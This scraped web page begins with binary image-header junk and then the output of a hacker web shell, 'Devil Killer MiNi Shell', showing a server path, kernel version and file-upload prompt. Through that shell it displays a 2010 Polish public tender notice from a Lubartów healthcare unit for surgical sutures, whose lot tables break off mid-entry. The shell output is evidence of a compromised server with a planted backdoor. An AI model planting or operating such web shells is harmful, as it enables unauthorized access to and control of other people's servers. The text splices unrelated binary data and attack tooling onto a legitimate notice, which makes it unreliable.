JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100414/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100414/83421-N-2010.html

<p class="kh_header"><b>Lubartów: DOSTAWY NICI CHIRURGICZNYCH</b><br>
<b>Numer ogłoszenia: 83421 - 2010; data zamieszczenia: 14.04.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny  Zakład Opieki Zdrowotnej , ul. Cicha 14, 21-100 Lubartów, woj. lubelskie, tel. 081 8556608, faks 081 8556608.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.spzoz-lubartow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DOSTAWY NICI CHIRURGICZNYCH.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zadanie 1 - 11.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.21-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 11.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 9.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, iż Wykonawca spełnia warunek posiadania uprawnień do wykonywania działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień jeśli przedstawi aktualny odpis z właściwego rejestru lub zaświadczenie o wpisie do ewidencji działalności gospodarczej</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, iż Wykonawca spełnia warunek posiadania wiedzy i doświadczenia  na podstawie przedstawionego oświadczenia (Załącznik Nr 2 do SIWZ) lub przedstawi pisemne zobowiązanie innych podmiotów do oddania mu do dyspozycji, na czas wykonywania niniejszego zamówienia, niezbędnych zasobów i środków.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, iż Wykonawca spełnia warunek dysponowania  odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia na podstawie przedstawionego oświadczenia (Załącznik Nr 2 do SIWZ) lub przedstawi pisemne zobowiązanie innych podmiotów do oddania mu do dyspozycji, na czas wykonywania niniejszego zamówienia, niezbędnych zasobów i środków.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, iż Wykonawca spełnia warunek dysponowania  odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia na podstawie przedstawionego oświadczenia (Załącznik Nr 2 do SIWZ) lub przedstawi pisemne zobowiązanie innych podmiotów do oddania mu do dyspozycji, na czas wykonywania niniejszego zamówienia, niezbędnych zasobów i środków.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający uzna, iż Wykonawca spełnia warunek sytuacji ekonomicznej i finansowej na postawnie przedstawionego oświadczenia (Załącznik Nr 2 do SIWZ) lub przedstawi pisemne zobowiązanie innych podmiotów do oddania mu do dyspozycji, na czas wykonywania niniejszego zamówienia, niezbędnych zasobów i środków.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Do oferty należy dołączyć oświadczenie, o posiadaniu wszelkich wymaganych dla danego towaru dokumentów dopuszczających do stosowania na rynku polskim (np. deklaracja zgodności wraz z certyfikactem jednostki notyfikowanej lub wpis do rejestru wyrobów medycznych i podmiotów odpowiedzialnych za ich wprowadzenie do obrotu i używanie lub inny dokument równoważny). Na każde pisemne żądanie Zamawiającego Wykonawca zobowiązuje się udostępnić dokument  do wglądu.
2.	Do oferty należy dołączyć instrukcje użytkowania w języku polskim oraz kopie stron  z katalogu oferowanego asortymentu w języku polskim wraz z zaznaczeniem zadania oraz pozycji zamówienia, której dotyczy.
3.	Do oferty należy dołączyć próbki określone w części III SIWZ.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.spzoz-lubartow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej w Lubartowie, ul. Cicha 14, 21-100 Lubartów, Sekcja ds. Zamówień Publicznych, pokój nr 15..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.04.2010 godzina 09:00, miejsce: Samodzielny Publiczny Zakład Opieki Zdrowotnej w Lubartowie   ul. Cicha 14  21-100 Lubartów  - SEKRETARIAT..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Grubość nici	Nr katal/ Nazwa nici	Igła obwód (+/-5%), rodzaj	Długość nitki w cm	
Ilość zamawianych saszetek na rok
1	4/0	 	1/2 koła/17mm/ okrągła	70-80	36
2	5/0	 	1/2 koła/17mm/ okrągła	70-80	36
3	4/0	 	1/2 koła/22mm/ okrągła	70-80	36
4	3/0	 	1/2 koła/37mm/ okrągła 	70-80	180
5	3/0	 	1/2 koła/30mm/ okrągła	70-80	180
6	3/0	 	1/2 koła/26mm/ okrągła	70-80	180
7	3/0	 	1/2 koła/22mm/ okrągła	70-80	144
8	2/0	 	1/2 koła/37mm/ okrągła	70-80	252
9	2/0	 	1/2 koła/30mm/ okrągła	70-80	288
10	2/0	 	1/2 koła/40mm/ okrągła	70-80	180
11	2/0	 	1/2 koła/65mm/ okrągła	70-80	288
12	1/0	 	1/2 koła/30mm/ okrągła	70-80	108
13	1/0	 	1/2 koła/37mm/ okrągła	70-80	252
14	1/0	 	1/2 koła/50mm/ okrągła	70-80	108
15	1/0	 	5/8 koła/40mm/ okrągła	70-80	216
16	1	 	1/2 koła/30mm/ okrągła	70-80	72
17	1	 	1/2 koła/40mm/ okrągła	70-80	180
18	1	 	1/2 koła/50mm/ okrągła	70-80	180
19	1	 	1/2 koła/65mm/ okrągła	90-100	144
20	2	 	1/2 koła/37mm/ okrągła	90-100	144
21	2	 	1/2 koła/65mm/ okrągła	60-150	288
22	3/0	 	podwiązka	3x40-45	108
23	2/0	 	podwiązka	3x40-45	468
24	1/0	 	podwiązka	3x40-45	108
25	2/0	 	pętla laparoskopowa z aplikatorem	52	12
26	4/0	 	1/2 koła /17mm/ okrągła	70-80	36
27	4/0	 	1/2 koła/ 26mm / okrągła	70-80	36
28	3/0	 	1/2 koła/ 26mm / okrągła	70-80	252
29	2/0	 	1/2 koła/ 26mm / okrągła	70-80	432
30	3/0	 	podwiązka na rolce	150-180	24
31	2/0	 	podwiązka na rolce	150-180	72
32	1/0	 	podwiązka na rolce	150-180	72
33	1	 	podwiązka na rolce	150-180	96
34	2	 	podwiązka na rolce	150-180	24.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.21-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 9.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Grubość nici	Igła obwód(+/-5%), rodzaj	Długość nitki 
w cm	Ilość zamawianych saszetek na rok
1.	4/0	1/2 koła/2x17mm/okrągła	80-90	12
2.	3/0	1/2 koła/2x26mm/okrągła	70-80	60
3.	2/0	1/2 koła/2x26mm/okrągła	70-80	72
4.	1/0	1/2 koła/40mm/ okrągła	90-100	12
5.	1	1/2 koła/40mm/ okrągła	90-100	12.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.21-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 9.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie 3.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Grubość nici	Igła obwód(+/-5%), rodzaj	Długość nitki w cm	Ilość zamawianych saszetek na rok
1	6/0	3/8 koła/11mm/ odwrotnie tnąca podwójna	45-60	12
2	3/0	3/8 koła/26mm/ konwencjonalnie tnąca 	40-60 niebarwiona 	60
3	3/0	1/2 koła/20mm/ okrągła	70-80	72
4	3/0	1/2 koła/26mm/ okrągła czarna	70-80	36
5	2/0	1/2 koła/30mm/ okrągła	70-80	72
6	2/0	1/2 koła/40mm/ okrągła	70-80	240
7	2/0	prosta/60mm/ odwrotnie tnąca	70-80	36
8	2/0	1/2 koła/65mm/ okrągła	70-80	120
9	1/0	1/2 koła/30mm/ okrągła                                     	70-80	96
10	1/0	1/2 koła/40mm/ okrągla	70-80	144
11	1/0	1/2 koła/48mm/ okrągła	70-80	120
12	1	1/2 koła/30mm/ okrągła	70-80	60
13	1	1/2 koła/40mm/ okrągła	70-80	120
14	1	1/2 koła/48mm/ okrągła	70-80	360
15	2	1/2 koła/48mm/ okrągła	70-80	360
16	3/0	podwiązka	3x40-45	288
17	2/0	podwiązka	3x40-45	324
18	1/0	podwiązka	3x40-45	216
19	1	podwiązka	3x40-45	108
20	2	podwiązka	3x40-45	36
21	3/0	podwiązka 	130-150	24
22	2/0	podwiązka	130-150	48
23	1/0	podwiązka	130-150	72
24	1	podwiązka	130-150	24
25	2	podwiązka	130-150	24
26	4/0	3/8 koła /26mm/ konwencjonalnie tnąca	40-60 niebarwiona 	24
27	2/0	3/8 koła /26mm/ konwencjonalnie tnąca	40-60 niebarwiona 	24
28	2/0	1/2 koła /26mm/okrągła	70-80	60
29	3/0	1/2 koła /26mm/okrągła	70-80	84
30	2/0	okragla laparoskopowa czarna	20-30	12.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.21-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 9.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zadanie 4.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp	Grubość nici	
Igła obwód(+/-5%), rodzaj	Długość nitki 
w cm	Ilość zamawianych saszetek na rok
1	4/0	1/2 koła /22mm/ okrągła	70-80	24
2	4/0	3/8 koła /19mm/ odwrotnie tnąca	45-60 niebarwiona	36
3	3/0	3/8 koła /19mm/ odwrotnie tnąca	45-60 niebarwiona	36
4	3/0 	1/2 koła /22mm/ okrągła	70-80	36
5	2/0	1/2 koła /22mm/ okrągła	70-80	36
6	3/0	1/2 koła /36mm/ okrągła	70-80	36
7	2/0	1/2 koła /36mm/ okrągła	70-80	36
8	1/0	1/2 koła /36mm/ okrągła	70-80	36
9	1	1/2 koła /36mm/ okrągła	70-80	36
10	2/0	1/2 koła /48mm/ okrągła wzmocniona	70-80	108
11	1/0	1/2 koła /48mm/ okrągła wzmocniona	70-90	72
12	1	1/2 koła /48mm/ okrągła wzmocniona	70-90	108
13	2	1/2 koła /48mm/ okrągła wzmocniona	70-90	288
14	3/0	prosta /60mm/ odwrotnie tnąca	70-80 niebarwiona	36
15	2/0	prosta /60mm/ odwrotnie tnąca	70-80 niebarwiona	216
16	4/0	3/8 koła /19mm/ odwrotnie tnąca	70-80 niebarwiona	12
17	3/0	3/8 koła /19mm/ odwrotnie tnąca	40-60 niebarwiona	12
18	3/0	1/2 koła /22mm/ okrągła	70-80	12.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.21-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 9.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zadanie 5.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Grubość nici	Igła obwód(+/-5%), rodzaj	Długość nitki w cm	Ilość zamawianych saszetek na rok
1	2	 	100 - 150	36
2	1/0	3/8 koła /40 mm/ odwrotnie tnąca	60-90	120
3	2/0	3/8 koła/ 26 mm/ odwrotnie tnąca	60-90	108
4	2/0	3/8 koła/ 40 mm/ odwrotnie tnąca	60-90	1500
5	3/0	3/8 koła/19mm/ odwrotnie tnąca	60-90	370
6	3/0	3/8 koła/25mm/ odwrotnie tnąca	60-90	240
7	4/0	3/8 koła/19mm/ odwrotnie tnąca	45-60	48
8	4/0	3/8 koła/25mm/ odwrotnie tnąca	45-60	216
9	5/0	3/8 koła/19mm/ odwrotnie tnąca	45-60	144
10	2	3/8 koła/40mm/ odwrotnie tnąca	60-90	36
11	1	3/8 koła/40mm/ odwrotnie tnąca	60-90	36.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.21-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 9.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Zadanie 6.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Grubość nici	Igła obwód(+/-5%), rodzaj	Długość nitki w cm	Ilość zamawianych saszetek na rok
1	5/0	3/8 koła/19mm/  odwrotnie tnąca	40-55	240
2	4/0	3/8 koła/20mm/  odwrotnie tnąca	40-55	462
3	3/0	3/8 koła/25mm/ odwrotnie tnąca	40-55	920
4	2/0	3/8 koła/30mm/ odwrotnie tnąca	40-75	660
5	1/0	3/8 koła/37mm/ odwrotnie tnąca	40-90	84
6	1	3/8 koła /40mm/ odwrotnie tnąca mocna	60-90	48.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.21-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 9.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Zadanie 7.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Grubość nici	Igła obwód(+/-5%), rodzaj	Długość nitki w cm	Ilość zamawianych saszetek na rok
1	5/0	3/8 koła /16mm/ odwrotnie tnąca	45-75	36
2	4/0	3/8 kołał /19mm/ odwrotnie tnąca	45-75	120
3	3/0	3/8 koła /26mm/ odwrotnie tnąca	45-75	320
4	2/0	3/8 koła /36mm/ odwrotnie tnąca	45-75	300
5	4/0	1/2 koła /17mm/ okrągła	45-75	36
6	3/0	1/2 koła /22mm/ okrągła	45-75	36
7	2/0	1/2 koła /26mm/ okrągła	45-75	72
8	2/0	1/2 koła /65mm/ okrągła	70-80	24
9	2/0	1/2 koła /31mm/ okrągła	70-80	36
10	1/0	3/8 koła /40mm/ odwrotnie tnąca	60-90	140
11	1	1/2 koła 48mm/ okrągła	70-80	700.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.21-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 9.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Zadanie 8.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Grubość nici	Igła obwód(+/-5%), rodzaj	Długość nitki w cm	Ilość zamawianych saszetek na rok
1	4/0	1/2 koła /22mm/ okrągła	70-80	12
2	4/0	3/8 koła /19mm/ odwrotnie tnąca	45-75	12
3	1	1/2 koła /48mm/ okrągła	70-80	12
4	1	1/2 koła /70mm/ okrągła	75-90	12.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.21-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 9.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Zadanie 9.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Grubość nici	Igła obwód(+/-5%), rodzaj	Długość nitki w cm	Ilość zamawianych saszetek na rok
1.
	4/0
	3/8 koła /26mm/ okrągła-tnąca
	20cm pętla
